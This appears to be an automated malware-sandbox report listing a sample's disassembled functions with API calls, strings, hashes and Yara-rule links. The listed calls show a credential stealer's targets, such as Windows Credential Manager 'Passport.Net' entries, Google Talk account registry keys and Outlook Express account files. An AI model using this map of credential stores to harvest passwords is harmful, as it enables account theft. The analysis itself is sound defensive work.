                                          • Opcode ID: c01e396ce511f8afc2eb7639449ba7f1f99c67e08b3586f0ab7a0846487aca4e
                                          • Instruction ID: 0355cd0d48ae578dfdfe4a6cbfa0b9af13deca75d91fcedaec1ea3361aee035e
                                          • Opcode Fuzzy Hash: c01e396ce511f8afc2eb7639449ba7f1f99c67e08b3586f0ab7a0846487aca4e
                                          • Instruction Fuzzy Hash: D0215773D0412C5EEB21EA55DD41BDA77ACDF45308F0000EBB648F6081E6789F588F55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004034D6, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004034F6
                                          • memset.MSVCRT ref: 0040350C
                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                          • _mbscpy.MSVCRT ref: 00403547
                                            • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                            • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                          • _mbscat.MSVCRT ref: 0040355F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscatmemset$Close_mbscpystrlen
                                          • String ID: InstallPath$Software\Group Mail$fb.dat
                                          • API String ID: 3071782539-966475738
                                          • Opcode ID: e35c848a323c92a1d31842152f609aeddade97801a3e26e866ac83a52e1d0630
                                          • Instruction ID: 06cca456285af6d778403e239192c4ceeddf5a100a2cf1fec545289e95a886a3
                                          • Opcode Fuzzy Hash: e35c848a323c92a1d31842152f609aeddade97801a3e26e866ac83a52e1d0630
                                          • Instruction Fuzzy Hash: 6901F07294412866EB20F2658C46FCB7A5C9B65705F0000B7BA49F20C3D9F86BD486A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F057, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                            • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                          • CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F09E
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F123
                                          • strlen.MSVCRT ref: 0040F133
                                          • _mbscpy.MSVCRT ref: 0040F144
                                          • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F151
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharCredFreeLocalMultiReadWidestrlen
                                          • String ID: Passport.Net\*
                                          • API String ID: 4000595657-3671122194
                                          • Opcode ID: c0e35485f09b5a24e447f0910c227e843a67b38e8fc9a121e48f37b6dcdb3ffc
                                          • Instruction ID: b181dd8ad3303716fcb3fe51c6d72bcd9c0cca2a33dd7682b011125bf867cc1e
                                          • Opcode Fuzzy Hash: c0e35485f09b5a24e447f0910c227e843a67b38e8fc9a121e48f37b6dcdb3ffc
                                          • Instruction Fuzzy Hash: B5316D76900109EBDB20EF96DD45EAEB7B9EF85701F0000BAE604E7291D7389A05CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C9F7, Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                          • String ID:
                                          • API String ID: 2054149589-0
                                          • Opcode ID: d475ca6c561f5eaf4fc753d3c68d3f995f62fff83656612615d29b2a36e03343
                                          • Instruction ID: 30546b7ffc0c4dd123ee27c8339ba671db17b069e44cca125f5e111fbf26b461
                                          • Opcode Fuzzy Hash: d475ca6c561f5eaf4fc753d3c68d3f995f62fff83656612615d29b2a36e03343
                                          • Instruction Fuzzy Hash: D22190B5900324DBDB10EF648CC97D97BA8AB44705F1445BBEE08EF296D7B849408BA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408344, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080A5
                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080B9
                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080D3
                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080E8
                                            • Part of subcall function 00408043: GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                            • Part of subcall function 00408043: GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                            • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                            • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                            • Part of subcall function 00408043: strlen.MSVCRT ref: 0040815B
                                            • Part of subcall function 00408043: strlen.MSVCRT ref: 0040816A
                                            • Part of subcall function 00408043: memcpy.MSVCRT ref: 0040817C
                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                          • memset.MSVCRT ref: 00408392
                                            • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                          • memset.MSVCRT ref: 004083E3
                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00408421
                                          • RegCloseKey.ADVAPI32(?), ref: 00408448
                                          Strings
                                          • Software\Google\Google Talk\Accounts, xrefs: 00408363
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                          • String ID: Software\Google\Google Talk\Accounts
                                          • API String ID: 2959138223-1079885057
                                          • Opcode ID: de50773ad60ad315725188ace9b51b45ce00f3af3b72c9474aab8c158646e734
                                          • Instruction ID: c6fde65740424625f6a31d6a262b66ef11e3a8462d59295f471bfbb40e3c967b
                                          • Opcode Fuzzy Hash: de50773ad60ad315725188ace9b51b45ce00f3af3b72c9474aab8c158646e734
                                          • Instruction Fuzzy Hash: 5E2183B100824AAED610DF51DD42EABB7DCEF94344F00043EFA84911A2F675DD5D9BAB
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B783, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Cursor_mbsicmpqsort
                                          • String ID: /nosort$/sort
                                          • API String ID: 882979914-1578091866
                                          • Opcode ID: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
                                          • Instruction ID: 59731eef90b6f0024c6c95bb6f71fb6a55e53d5caa10bc7ba91746e522f0a21b
                                          • Opcode Fuzzy Hash: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
                                          • Instruction Fuzzy Hash: AF21C4B1704501EFD719AB75C880AA9F3A8FF88314F21013EF419A7292C738B8118B99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041072B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041067E: LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                            • Part of subcall function 0041067E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                          • memset.MSVCRT ref: 00410780
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                          • _mbscpy.MSVCRT ref: 004107F7
                                            • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0041079B, 004107AB
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                          • API String ID: 889583718-2036018995
                                          • Opcode ID: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
                                          • Instruction ID: 55274f9b0d4144c5a5f6b064647028c43f69cf0431b3c32ec78c32e38a1c383e
                                          • Opcode Fuzzy Hash: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
                                          • Instruction Fuzzy Hash: 2811D071C00218FBEB24F6948C85EEF77AC9B15304F1400B7F95161192E6B99ED4CA99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004105DD, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindResourceA.KERNEL32(?,?,?), ref: 004105EA
                                          • SizeofResource.KERNEL32(?,00000000), ref: 004105FB
                                          • LoadResource.KERNEL32(?,00000000), ref: 0041060B
                                          • LockResource.KERNEL32(00000000), ref: 00410616
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Resource$FindLoadLockSizeof
                                          • String ID:
                                          • API String ID: 3473537107-0
                                          • Opcode ID: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
                                          • Instruction ID: 4a68303d5b5253afd20c9a06ef53f1b3f3171458fb19c91adc6236e38678b247
                                          • Opcode Fuzzy Hash: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
                                          • Instruction Fuzzy Hash: 88019636600315AB8F155F65DC4599F7FAAFFD63917088036F909CA361D7B1C891C68C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410344, Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0041036C
                                            • Part of subcall function 0040735C: sprintf.MSVCRT ref: 00407394
                                            • Part of subcall function 0040735C: memcpy.MSVCRT ref: 004073A7
                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410390
                                          • memset.MSVCRT ref: 004103A7
                                          • GetPrivateProfileStringA.KERNEL32(?,?,0044551F,?,00002000,?), ref: 004103C5
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                          • String ID:
                                          • API String ID: 3143880245-0
                                          • Opcode ID: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
                                          • Instruction ID: 9d0f41c8c3888dc292d70de46467aaf9ffb36b28435196f73ffda5293cd27e0f
                                          • Opcode Fuzzy Hash: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
                                          • Instruction Fuzzy Hash: B501847280431DBFEF116F60EC89EDB7B79EF04314F1000A6FA08A2052D6759D64DB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0044497B, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: dea8053bea9519698d4384faa1004d995cd5135f168310e2c543446b5ccfe19c
                                          • Instruction ID: 50686d444a9e23a331db2cec4592ac0caeb7afc27ca0d185df797a95cebddf31
                                          • Opcode Fuzzy Hash: dea8053bea9519698d4384faa1004d995cd5135f168310e2c543446b5ccfe19c
                                          • Instruction Fuzzy Hash: 70E0E6A170470196BA24ABBFBD55B1723ECAA84B66314092FB508D72B2DF2CD864D52C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408AA5, Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          • Opcode ID: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
                                          • Instruction ID: 91b6e48186620c166d1d4af44a265f78501a0d7a4e3c1a8b362a1fb29a74aa2a
                                          • Opcode Fuzzy Hash: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
                                          • Instruction Fuzzy Hash: 17F0F9B5901300AFE7549B3CED0672676E4E75C356F04983FA30A8A2F2EB79C8448B08
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406CCE, Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@mallocmemcpy
                                          • String ID:
                                          • API String ID: 3831604043-0
                                          • Opcode ID: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                          • Instruction ID: 120c5a36fa875b11696935209168df4f9df621bec9a22d80de65970bbd8b26ad
                                          • Opcode Fuzzy Hash: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                          • Instruction Fuzzy Hash: 13F0E9727053225FD708EB75B94184B73DDAF84324712482FF505E7282D7389C60CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406E26, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                            • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                          • CreateFontIndirectA.GDI32(?), ref: 00406E44
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CreateFontIndirect_mbscpymemset
                                          • String ID: Arial
                                          • API String ID: 3853255127-493054409
                                          • Opcode ID: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                          • Instruction ID: b68263c9f29210b4531b01fb65f498acbd183b68a5d206dac463ad1e531dcf8e
                                          • Opcode Fuzzy Hash: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                          • Instruction Fuzzy Hash: FFD0C974E4020C67DA10B7A0FC07F49776C5B01705F510421B901B10E2EAA4A15886D9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00444A0F, Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                          • Instruction ID: ba634a3ae7870b83a4a63a7f1e5f980291c684f9ee159ca978f4bf55c64cb7ac
                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                          • Instruction Fuzzy Hash: 8C21F9521C82826FFB218BB44C017676FD9CBD3364B190A87E040EB243D5AC5856937E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040CB90, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 74COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00401E60: memset.MSVCRT ref: 00401E82
                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401E9B
                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EA9
                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EEF
                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EFD
                                          • _strcmpi.MSVCRT ref: 0040CBE4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_strcmpimemset
                                          • String ID: /stext
                                          • API String ID: 520177685-3817206916
                                          • Opcode ID: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                          • Instruction ID: cdbc65eb55c3596dd52c6b91df7f07afa5e13005eab10b9a6f004d04cd94ae5a
                                          • Opcode Fuzzy Hash: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                          • Instruction Fuzzy Hash: CE216271618111DFD35CEB39D8C1A66B3A9FF04314B15427FF41AA7282C738EC118B89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00444A4E, Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                          • Instruction ID: 64d8077581e7bfcf5b5a7686d9ec621b59dbeaea1ec513f5aad7139115001ce4
                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                          • Instruction Fuzzy Hash: 2C012D015C564139FB20A6F50C02BBB5F8D8AD7364B181B4BF150F7293D99C8D16937E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00444A6B, Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00444A5C,00444A45), ref: 00444A7E
                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00444A5C,00444A45), ref: 00444A92
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                          • Instruction ID: 9d415219164cce1615491981170e8b778fb578cfb811cd04a9329a68800e1f42
                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                          • Instruction Fuzzy Hash: DCF0C2412C52817DFB2195F50C42BBB4FCC8AE7360B280B47B110EB283D49D8D1693BE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040472F, Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                          • LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc
                                          • String ID:
                                          • API String ID: 145871493-0
                                          • Opcode ID: 19cbb58c83f46949a6f81fbd15abd7b556fa9c3d80d4a4eb7eee3cb29104cd1a
                                          • Instruction ID: 2550b76864eeaa7c500838184e9c491a546ed4ce74a868b02878dd57666eb7ef
                                          • Opcode Fuzzy Hash: 19cbb58c83f46949a6f81fbd15abd7b556fa9c3d80d4a4eb7eee3cb29104cd1a
                                          • Instruction Fuzzy Hash: A5F01BF4600B029FD760AF35E848B9B77E5AF86710F00453EF665E3182D778A545CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004103E0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410407
                                            • Part of subcall function 004102F8: memset.MSVCRT ref: 00410316
                                            • Part of subcall function 004102F8: _itoa.MSVCRT ref: 0041032D
                                            • Part of subcall function 004102F8: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0041033C
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfile$StringWrite_itoamemset
                                          • String ID:
                                          • API String ID: 4165544737-0
                                          • Opcode ID: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                          • Instruction ID: a6fec7de448531cc7e5bdd8bb9ba05dfe42c6da5839e04c605b7484fd2ec2d67
                                          • Opcode Fuzzy Hash: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                          • Instruction Fuzzy Hash: 23E0BD3204060EBFCF125F80EC05AAA7BA6FF04354F24886AFD6804121D77299F0AB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404780, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
                                          • Instruction ID: 32a23a6afe1256adb8d295dcdce629e4b632fcbc5e0d618fa027d99050396328
                                          • Opcode Fuzzy Hash: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
                                          • Instruction Fuzzy Hash: D7D012714003118FDB609F14FD4CBA173E8AF41312F1504B8E994AB192C3749840CA58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406AB8, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040ABFF,00000000), ref: 00406ACA
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
                                          • Instruction ID: 174152b0962da7481451d0c07619c80c3ba7c59bd8607505f6d9dddbb6799519
                                          • Opcode Fuzzy Hash: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
                                          • Instruction Fuzzy Hash: 08C012F06503007FFF204B10AC0AF37369DD780700F1044207E00E40E1C2A14C40C524
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410166, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                          • Instruction ID: 507e23945262d0460dd2b0da46a8ed0ea94319227dbecdfb5597338915b85de2
                                          • Opcode Fuzzy Hash: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                          • Instruction Fuzzy Hash: 6EC04C35510B019BEB219B22D949753B7E4AB05316F40C81CA59695451D7BCE494CE18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410663, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnumResourceNamesA.KERNEL32(?,?,Function_000105DD,00000000), ref: 00410672
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: EnumNamesResource
                                          • String ID:
                                          • API String ID: 3334572018-0
                                          • Opcode ID: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
                                          • Instruction ID: e40f58546d13f5b106010a29914381b046978f91ca1901c00a2019c551bf0e65
                                          • Opcode Fuzzy Hash: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
                                          • Instruction Fuzzy Hash: A0C09B31554341A7C701DF108C09F1A7695BB55705F504C297151940A4C7514054DB15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407D1F, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindClose.KERNELBASE(?,00407C39,?,?,00000000,.8D,0044373A,*.oeaccount,.8D,?,00000104), ref: 00407D29
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          • Opcode ID: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
                                          • Instruction ID: e21386352e8edd65572014a1fcaa83e24a75218a268847cd9e3b74dd15e40f0a
                                          • Opcode Fuzzy Hash: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
                                          • Instruction Fuzzy Hash: 50C092349109018FD62C9F38DC5A52A77A0BF5A3343B40F6CA0F3D20F0E778A842CA08
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00410411, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
                                          • Instruction ID: 9e85f5290c785a84adc9a585aa79e4266a03e2402c05001ad2ac5d5d83fda341
                                          • Opcode Fuzzy Hash: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
                                          • Instruction Fuzzy Hash: 40C09B39544301BFDE114F40FD05F09BB61BB84F05F504414B244240B182714414EB57
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406D1F, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
                                          • Instruction ID: 1a596b20ff26773e60743876e99a20c5f0c5c53ebb8dbfb842e64d2fd6ed3a7e
